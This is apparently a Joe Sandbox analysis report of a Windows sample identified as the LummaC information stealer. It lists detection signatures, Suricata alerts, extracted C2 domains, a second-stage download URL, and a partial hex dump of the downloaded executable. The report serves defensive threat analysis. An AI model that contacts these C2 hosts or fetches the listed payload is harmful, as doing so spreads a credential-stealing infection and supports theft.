Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560038
MD5:af5975cd36b5096ac13f087ccd77ed34
SHA1:e9f010595b29a3fb4acbebea522fa83e3b25de65
SHA256:d0c28013e3bb4e0cb20b06af7f90dcfb9ef5c5ca6d9db4a438e09f20a3dd3a96
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 4540 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AF5975CD36B5096AC13F087CCD77ED34)
    • chrome.exe (PID: 5492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 3392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1880,i,2658369671924741548,14956457475855153189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2000,i,6861188437534111061,5673823380615513189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["processhol.sbs", "3xp3cts1aim.sbs", "peepburry828.sbs", "p10tgrace.sbs", "p3ar11fter.sbs"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2386311395.000000000176C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 4540JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: file.exe PID: 4540JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 4540JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T10:37:20.773793+010020283713Unknown Traffic192.168.2.649720188.114.97.3443TCP
            2024-11-21T10:37:22.795011+010020283713Unknown Traffic192.168.2.649726188.114.97.3443TCP
            2024-11-21T10:37:25.115378+010020283713Unknown Traffic192.168.2.649733188.114.97.3443TCP
            2024-11-21T10:37:27.812787+010020283713Unknown Traffic192.168.2.649739188.114.97.3443TCP
            2024-11-21T10:37:30.767198+010020283713Unknown Traffic192.168.2.649750188.114.97.3443TCP
            2024-11-21T10:37:34.080660+010020283713Unknown Traffic192.168.2.649757188.114.97.3443TCP
            2024-11-21T10:37:37.191404+010020283713Unknown Traffic192.168.2.649766188.114.97.3443TCP
            2024-11-21T10:37:42.486530+010020283713Unknown Traffic192.168.2.649781188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T10:37:21.468898+010020546531A Network Trojan was detected192.168.2.649720188.114.97.3443TCP
            2024-11-21T10:37:23.486841+010020546531A Network Trojan was detected192.168.2.649726188.114.97.3443TCP
            2024-11-21T10:37:43.181989+010020546531A Network Trojan was detected192.168.2.649781188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T10:37:21.468898+010020498361A Network Trojan was detected192.168.2.649720188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T10:37:23.486841+010020498121A Network Trojan was detected192.168.2.649726188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T10:37:20.773793+010020577311Domain Observed Used for C2 Detected192.168.2.649720188.114.97.3443TCP
            2024-11-21T10:37:22.795011+010020577311Domain Observed Used for C2 Detected192.168.2.649726188.114.97.3443TCP
            2024-11-21T10:37:25.115378+010020577311Domain Observed Used for C2 Detected192.168.2.649733188.114.97.3443TCP
            2024-11-21T10:37:27.812787+010020577311Domain Observed Used for C2 Detected192.168.2.649739188.114.97.3443TCP
            2024-11-21T10:37:30.767198+010020577311Domain Observed Used for C2 Detected192.168.2.649750188.114.97.3443TCP
            2024-11-21T10:37:34.080660+010020577311Domain Observed Used for C2 Detected192.168.2.649757188.114.97.3443TCP
            2024-11-21T10:37:37.191404+010020577311Domain Observed Used for C2 Detected192.168.2.649766188.114.97.3443TCP
            2024-11-21T10:37:42.486530+010020577311Domain Observed Used for C2 Detected192.168.2.649781188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T10:37:44.699485+010020197142Potentially Bad Traffic192.168.2.649787185.215.113.1680TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T10:37:19.039633+010020577301Domain Observed Used for C2 Detected192.168.2.6641721.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-21T10:37:26.059163+010020480941Malware Command and Control Activity Detected192.168.2.649733188.114.97.3443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: file.exeAvira: detected
            Source: http://185.215.113.16/off/def.exepAvira URL Cloud: Label: phishing
            Source: https://cook-rain.sbs/apiBAvira URL Cloud: Label: malware
            Source: https://cook-rain.sbs/(Avira URL Cloud: Label: malware
            Source: https://cook-rain.sbs/apixg3Avira URL Cloud: Label: malware
            Source: https://cook-rain.sbs/4Avira URL Cloud: Label: malware
            Source: https://cook-rain.sbs/api_timeAvira URL Cloud: Label: malware
            Source: https://cook-rain.sbs/AAvira URL Cloud: Label: malware
            Source: https://cook-rain.sbs/api3Avira URL Cloud: Label: malware
            Source: file.exe.4540.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["processhol.sbs", "3xp3cts1aim.sbs", "peepburry828.sbs", "p10tgrace.sbs", "p3ar11fter.sbs"], "Build id": "LOGS11--LiveTraffic"}
            Source: file.exeReversingLabs: Detection: 44%
            Source: file.exeJoe Sandbox ML: detected
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.6:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49781 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49809 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49810 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49843 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49852 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49897 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49910 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49934 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50011 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50023 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50097 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50096 version: TLS 1.2

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057730 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) : 192.168.2.6:64172 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49739 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49726 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49720 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49766 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49781 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49750 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49733 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057731 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) : 192.168.2.6:49757 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49726 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49726 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49720 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49733 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49720 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49781 -> 188.114.97.3:443
            Source: Malware configuration extractorURLs: processhol.sbs
            Source: Malware configuration extractorURLs: 3xp3cts1aim.sbs
            Source: Malware configuration extractorURLs: peepburry828.sbs
            Source: Malware configuration extractorURLs: p10tgrace.sbs
            Source: Malware configuration extractorURLs: p3ar11fter.sbs
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 21 Nov 2024 09:37:44 GMTContent-Type: application/octet-streamContent-Length: 2846720Last-Modified: Thu, 21 Nov 2024 08:20:50 GMTConnection: keep-aliveETag: "673eed62-2b7000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2c 00 00 04 00 00 9f ac 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 65 71 6f 6a 72 75 64 75 00 20 2b 00 00 a0 00 00 00 10 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 66 6f 66 6e 63 72 61 00 20 00 00 00 c0 2b 00 00 04 00 00 00 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2b 00 00 22 00 00 00 4e 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: Joe Sandbox ViewIP Address: 13.107.246.45 13.107.246.45
            Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49739 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49726 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49720 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49766 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49781 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49750 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49733 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49787 -> 185.215.113.16:80
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49757 -> 188.114.97.3:443
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.17
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
            Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120100v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
